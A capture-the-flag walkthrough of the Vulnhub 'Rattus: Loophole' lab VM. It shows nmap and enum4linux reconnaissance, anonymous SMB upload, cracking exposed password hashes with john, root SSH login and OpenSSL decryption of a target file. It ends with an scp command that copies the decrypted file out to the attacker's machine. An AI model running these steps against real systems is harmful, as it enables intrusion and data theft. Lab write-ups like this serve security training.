Rattus: Loophole Walkthrough

Loophole is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
Hi everyone!
Recently I’ve created my own Live CD and would like to get some feedback from you. This Live CD, codename Loophole, is meant to show you how important it is to keep your software up to date and properly configured. There’s more than one way into the system and each one of them will teach you different network/computer security related topics.
Scenario for Loophole Live CD:
We suspect that someone inside Rattus labs is working with known terrorist group. Your mission is to infiltrate into their computer network and obtain encrypted document from one of their servers. Our inside source has told us that the document is saved under the name of Private.doc.enc and is encrypted using OpenSSL encryption utility. Obtain the document and decrypt it to complete the mission.

Set the IP address of the attacker machine

root@kali:~# ifconfig eth0 10.8.7.6 netmask 255.255.255.248

Identify the IP address of Rattus: Loophole machine
Nmap Ping Scan

root@kali:~# nmap -PR -sn 10.8.7.0/29
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-16 14:36 EDT
Nmap scan report for 10.8.7.2
Host is up (0.00029s latency).
MAC Address: 08:00:27:68:39:C6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.8.7.6
Host is up.
Nmap done: 8 IP addresses (2 hosts up) scanned in 0.44 seconds
root@kali:~#

Identify services running on Rattus: Loophole machine

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 10.8.7.2

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-16 15:41 EDT
NSE: Loaded 144 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Initiating NSE at 15:41
Completed NSE at 15:41, 0.00s elapsed
Initiating ARP Ping Scan at 15:41
Scanning 10.8.7.2 [1 port]
Completed ARP Ping Scan at 15:41, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:41
Completed Parallel DNS resolution of 1 host. at 15:41, 13.00s elapsed
Initiating Connect Scan at 15:41
Scanning 10.8.7.2 [65535 ports]
Discovered open port 80/tcp on 10.8.7.2
Discovered open port 139/tcp on 10.8.7.2
Discovered open port 445/tcp on 10.8.7.2
Discovered open port 113/tcp on 10.8.7.2
Discovered open port 22/tcp on 10.8.7.2
Completed Connect Scan at 15:41, 3.04s elapsed (65535 total ports)
Initiating Service scan at 15:41
Scanning 5 services on 10.8.7.2
Completed Service scan at 15:43, 146.15s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 10.8.7.2
NSE: Script scanning 10.8.7.2.
Initiating NSE at 15:43
Completed NSE at 15:44, 30.47s elapsed
Initiating NSE at 15:44
Completed NSE at 15:44, 1.03s elapsed
Nmap scan report for 10.8.7.2
Host is up (0.0013s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.4 (protocol 1.99)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey:
| 2048 0b:95:f5:59:5b:63:d3:54:5f:45:5f:50:ee:34:23:6d (RSA1)
| 1024 3b:00:56:67:53:9c:d4:b6:cb:5f:b5:b9:94:35:c5:c9 (DSA)
|_ 2048 78:14:ca:10:4d:e9:57:d0:52:a5:99:75:02:e7:30:33 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.31 ((Unix) PHP/4.4.4)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE CONNECT OPTIONS PATCH PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK TRACE
|_ Potentially risky methods: PUT DELETE CONNECT PATCH PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK TRACE
|_http-server-header: Apache/1.3.31 (Unix) PHP/4.4.4
|_http-title: Loophole - Rattus labs
113/tcp open ident?
|_auth-owners: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:68:39:C6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Uptime guess: 0.013 days (since Sun Jul 16 15:24:55 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: mean: -2h00m03s, deviation: 0s, median: -2h00m03s
| nbstat: NetBIOS name: LOOPHOLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| LOOPHOLE<00> Flags: <unique><active>
| LOOPHOLE<03> Flags: <unique><active>
| LOOPHOLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
|_ WORKGROUP<00> Flags: <group><active>
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: plaintext-only (dangerous)
|_ message_signing: supported
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT ADDRESS
1 1.26 ms 10.8.7.2

NSE: Script Post-scanning.
Initiating NSE at 15:44
Completed NSE at 15:44, 0.00s elapsed
Initiating NSE at 15:44
Completed NSE at 15:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.68 seconds
Raw packets sent: 36 (2.546KB) | Rcvd: 32 (2.150KB)
root@kali:~#

Port 139/tcp — netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)

Run enum4linux

root@kali:~# enum4linux 10.8.7.2
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jul 16 17:08:10 2017

==========================
| Target Information |
==========================
Target ........... 10.8.7.2
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


================================================
| Enumerating Workgroup/Domain on 10.8.7.2 |
================================================
[+] Got domain/workgroup name: WORKGROUP

========================================
| Nbtstat Information for 10.8.7.2 |
========================================
Looking up status of 10.8.7.2
LOOPHOLE <00> - B <ACTIVE> Workstation Service
LOOPHOLE <03> - B <ACTIVE> Messenger Service
LOOPHOLE <20> - B <ACTIVE> File Server Service
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

=================================
| Session Check on 10.8.7.2 |
=================================
[+] Server 10.8.7.2 allows sessions using username '', password ''

=======================================
| Getting domain SID for 10.8.7.2 |
=======================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

==================================
| OS information on 10.8.7.2 |
==================================
[+] Got OS info for 10.8.7.2 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]
[+] Got OS info for 10.8.7.2 from srvinfo:
LOOPHOLE Wk Sv PrQ Unx NT SNT Samba server by Rattus labs
platform_id : 500
os version : 4.9
server type : 0x809a03

=========================
| Users on 10.8.7.2 |
=========================
index: 0x1 RID: 0x7d0 acb: 0x00000010 Account: mhog Name: Mark Hog,+38599112911,,Ilica 13 Desc: (null)

user:[mhog] rid:[0x7d0]

=====================================
| Share Enumeration on 10.8.7.2 |
=====================================
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]

Sharename Type Comment
--------- ---- -------
homes Disk Home directories
tmp Disk Temporary file space
IPC$ IPC IPC Service (Samba server by Rattus labs)

Server Comment
--------- -------
LOOPHOLE Samba server by Rattus labs

Workgroup Master
--------- -------
WORKGROUP

[+] Attempting to map shares on 10.8.7.2
//10.8.7.2/homes [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.8.7.2/tmp Mapping: OK, Listing: OK
//10.8.7.2/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]
do_list: [\*] NT_STATUS_NETWORK_ACCESS_DENIED

================================================
| Password Policy Information for 10.8.7.2 |
================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 33, in <module>
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
ImportError: cannot import name dcerpc_v4
[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


==========================
| Groups on 10.8.7.2 |
==========================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

===================================================================
| Users on 10.8.7.2 via RID cycling (RIDS: 500-550,1000-1050) |
===================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-877857752-1703807887-1587427169
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-877857752-1703807887-1587427169 and logon username '', password ''
S-1-5-21-877857752-1703807887-1587427169-500 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-501 LOOPHOLE\nobody (Local User)
S-1-5-21-877857752-1703807887-1587427169-502 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-503 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-504 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-505 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-506 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-507 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-508 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-509 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-510 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-511 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-512 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-513 LOOPHOLE\None (Domain Group)
S-1-5-21-877857752-1703807887-1587427169-514 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-515 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-516 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-517 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-518 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-519 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-520 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-521 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-522 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-523 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-524 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-525 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-526 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-527 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-528 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-529 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-530 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-531 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-532 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-533 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-534 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-535 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-536 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-537 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-538 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-539 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-540 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-541 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-542 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-543 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-544 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-545 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-546 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-547 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-548 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-549 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-550 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1000 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1001 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1002 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1003 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1004 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1005 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1006 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1007 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1008 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1009 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1010 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1011 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1012 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1013 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1014 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1015 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1016 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1017 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1018 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1019 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1020 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1021 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1022 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1023 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1024 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1025 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1026 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1027 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1028 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1029 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1030 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1031 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1032 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1033 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1034 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1035 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1036 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1037 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1038 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1039 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1040 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1041 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1042 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1043 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1044 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1045 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1046 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1047 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1048 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1049 *unknown*\*unknown* (8)
S-1-5-21-877857752-1703807887-1587427169-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-500 Unix User\mhog (Local User)
S-1-22-1-501 Unix User\tskies (Local User)
S-1-22-1-502 Unix User\jsummer (Local User)

=========================================
| Getting printer info for 10.8.7.2 |
=========================================
No printers returned.


enum4linux complete on Sun Jul 16 17:08:27 2017

root@kali:~#

Run nbtscan

root@kali:~# nbtscan 10.8.7.2
Doing NBT name scan for addresses from 10.8.7.2

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
10.8.7.2 LOOPHOLE <server> LOOPHOLE 00:00:00:00:00:00
root@kali:~#

Run smbclient

root@kali:~# smbclient -L 10.8.7.2
WARNING: The "syslog" option is deprecated
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]

Sharename Type Comment
--------- ---- -------
homes Disk Home directories
tmp Disk Temporary file space
IPC$ IPC IPC Service (Samba server by Rattus labs)

Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]

Server Comment
--------- -------
LOOPHOLE Samba server by Rattus labs

Workgroup Master
--------- -------
WORKGROUP LOOPHOLE
root@kali:~#

Enumerating the shares

root@kali:~# smbclient -I 10.8.7.2 "//LOOPHOLE/tmp" -U "" -N
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.23c]
smb: \> ls
. D 0 Sun Jul 16 14:55:40 2017
.. D 0 Sun Jul 16 16:36:06 2017
session_mm_apache0.sem N 0 Sun Jul 16 14:36:22 2017
.X11-unix DH 0 Sun Jul 16 14:36:12 2017
.ICE-unix DH 0 Sun Jul 16 14:36:12 2017

618136 blocks of size 1024. 614164 blocks available
smb: \> put test.txt
putting file test.txt as \test.txt (0.0 kb/s) (average -nan kb/s)
smb: \> ls
. D 0 Sun Jul 16 14:59:50 2017
.. D 0 Sun Jul 16 16:36:06 2017
test.txt A 0 Sun Jul 16 14:59:50 2017
session_mm_apache0.sem N 0 Sun Jul 16 14:36:22 2017
.X11-unix DH 0 Sun Jul 16 14:36:12 2017
.ICE-unix DH 0 Sun Jul 16 14:36:12 2017

618136 blocks of size 1024. 614164 blocks available
smb: \> exit
root@kali:~#

/tmp/ is world writable.

Port 80/tcp — http Apache httpd 1.3.31 ((Unix) PHP/4.4.4)

Run dirb

root@kali:~# dirb http://10.8.7.2
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Jul 16 14:45:23 2017
URL_BASE: http://10.8.7.2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.8.7.2/ ----
+ http://10.8.7.2/~operator (CODE:403|SIZE:275)
+ http://10.8.7.2/~root (CODE:403|SIZE:271)
+ http://10.8.7.2/cgi-bin/ (CODE:403|SIZE:274)
+ http://10.8.7.2/garbage (CODE:200|SIZE:288)
==> DIRECTORY: http://10.8.7.2/Images/
+ http://10.8.7.2/index (CODE:200|SIZE:3001)
+ http://10.8.7.2/index.html (CODE:200|SIZE:3001)
+ http://10.8.7.2/info (CODE:200|SIZE:37650)
+ http://10.8.7.2/info.php (CODE:200|SIZE:37490)
+ http://10.8.7.2/status (CODE:200|SIZE:2456)

---- Entering directory: http://10.8.7.2/Images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Jul 16 14:45:26 2017
DOWNLOADED: 4612 - FOUND: 9
root@kali:~#

Going through various files

http://10.8.7.2/
http://10.8.7.2/info
http://10.8.7.2/status
http://10.8.7.2/garbage

garbage file can be passed to john to crack passwords

Crack passwords using John

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt Desktop/garbage --format=aix-smd5
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (aix-smd5, AIX LPA {smd5} (modified crypt-md5) [MD5 32/32])
Remaining 2 password hashes with 2 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
nostradamus (tskies)
albatros (root)

2g 0:00:00:17 DONE (2017-07-16 15:07) 0.1148g/s 3197p/s 5177c/s 5177C/s albatros
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#

Port — 22/tcp ssh OpenSSH 4.4 (protocol 1.99)

Login to root

root@kali:~# ssh root@10.8.7.2
The authenticity of host '10.8.7.2 (10.8.7.2)' can't be established.
RSA key fingerprint is SHA256:/ImnGb3SLVVKTlS5WKtqBWqlng2kEqe+lQFbKjMe+j4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.8.7.2' (RSA) to the list of known hosts.
===========================================================
WELCOME TO RATTUS LABS
===========================================================
You've been connected to loophole.rattus.lab
To access the system you must use valid credentials.
===========================================================
root@10.8.7.2's password: 
Last login: Wed Feb 16 11:20:48 2011
===========================================================
WELCOME TO RATTUS LABS
===========================================================
I'm here to serve you MASTER ...
===========================================================
[root@loophole]$  ls
Desktop/ loadlin16c.txt loadlin16c.zip
[root@loophole]$ find / -name Private.doc.enc
/mnt/live/memory/images/home.lzm/home/tskies/Private.doc.enc
/home/tskies/Private.doc.enc
[root@loophole]$ file /home/tskies/Private.doc.enc
/home/tskies/Private.doc.enc: data
[root@loophole]$
[root@loophole]$ cat .bash_history
[root@loophole]$

We found Private.doc.enc

Lets login to tskies

root@kali:~# ssh tskies@10.8.7.2
===========================================================
WELCOME TO RATTUS LABS
===========================================================
You've been connected to loophole.rattus.lab
To access the system you must use valid credentials.
===========================================================
tskies@10.8.7.2's password: 
Last login: Wed Feb 16 08:52:46 2011
===========================================================
WELCOME TO RATTUS LABS
===========================================================
I'm here to serve you MASTER ...
===========================================================
[tskies@loophole]$  ls
Desktop/ Private.doc.enc temp/
[tskies@loophole]$ cat .bash_history
openssl enc -aes-256-cbc -e -in Private.doc -out Private.doc.enc -pass pass:nostradamus
startx
nano .bash_history
exit
[tskies@loophole]$ openssl enc -aes-256-cbc -d -in Private.doc.enc -out Private.doc -pass pass:nostradamus
[tskies@loophole]$ ls
Desktop/ Private.doc Private.doc.enc temp/
[tskies@loophole]$ which nc
which: no nc in (/usr/local/bin:/usr/bin:/bin:/usr/games:/usr/lib/java/bin:/usr/lib/java/jre/bin:/usr/lib/qt/bin:.)
[tskies@loophole]$

As nc is not available lets use scp to transfer the decrypted file to our local machine

[tskies@loophole]$  scp Private.doc root@10.8.7.6:/root/
The authenticity of host '10.8.7.6 (10.8.7.6)' can't be established.
RSA key fingerprint is 94:80:fb:43:15:89:e3:7f:fb:eb:b4:39:e3:78:67:fa.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.8.7.6' (RSA) to the list of known hosts.
root@10.8.7.6's password:
Private.doc 100% 381KB 381.0KB/s 00:00
[tskies@loophole]$

The contents of the file are as follows

The document has been successfully obtained.

Happy Hacking !!!